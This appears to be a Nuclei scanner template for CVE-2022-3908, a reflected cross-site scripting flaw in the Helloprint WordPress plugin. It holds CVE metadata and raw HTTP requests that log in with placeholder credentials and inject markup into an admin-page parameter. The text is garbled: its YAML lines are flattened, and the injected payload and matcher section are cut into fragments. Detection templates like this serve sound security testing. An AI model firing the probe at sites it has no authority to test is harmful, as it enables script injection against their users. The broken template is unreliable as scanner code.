id: CVE-2022-3908 info: name: Helloprint < 1.4.7 - Cross-Site Scripting author: theamanrawat severity: medium description: | The Helloprint WordPress plugin before 1.4.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. remediation: Fixed in version 1.4.7 reference: - https://wpscan.com/vulnerability/c44802a0-8cbe-4386-9523-3b6cb44c6505 - https://wordpress.org/plugins/helloprint/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3908 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3908 cwe-id: CWE-79 metadata: verified: "true" tags: xss,wordpress,wp-plugin,helloprint,cve,cve2022,wp,authenticated,wpscan requests: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=language-translate.php&success=added"> successfully")' condition: and